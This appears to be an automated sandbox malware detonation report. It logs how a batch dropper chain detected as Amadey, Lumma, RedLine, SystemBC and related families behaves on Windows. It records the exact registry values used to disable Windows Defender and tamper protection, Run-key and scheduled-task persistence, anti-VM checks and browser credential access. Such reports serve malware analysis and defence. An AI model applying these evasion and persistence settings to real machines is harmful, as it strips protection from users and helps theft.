Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2600 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabDC9.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\Local\Temp\TarE6C.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Analysis: behavioral14

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

152s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

SystemBC

trojan systembc

Systembc family

systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\rsxrj\oqftxb.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\rsxrj\oqftxb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\rsxrj\oqftxb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempUZ8JFEPJWMOG5IKEJHERG5Z85NJRUEFV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\ProgramData\rsxrj\oqftxb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036610101\0frhMAb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036630101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\ProgramData\rsxrj\oqftxb.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\942382b6ad.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\942382b6ad.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\45d700a7e2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036490101\\45d700a7e2.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5f36c561b1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036500101\\5f36c561b1.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9a7ac1fba5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10036510101\\9a7ac1fba5.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036490101\45d700a7e2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\rsxrj\oqftxb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempUZ8JFEPJWMOG5IKEJHERG5Z85NJRUEFV.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036600101\6NPpGdC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036580101\5e972f7dcc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036590101\7axE6Jz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10036500101\5f36c561b1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036620101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10036630101\MCxU5Fj.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10036640101\q3na5Mc.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName N/A N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
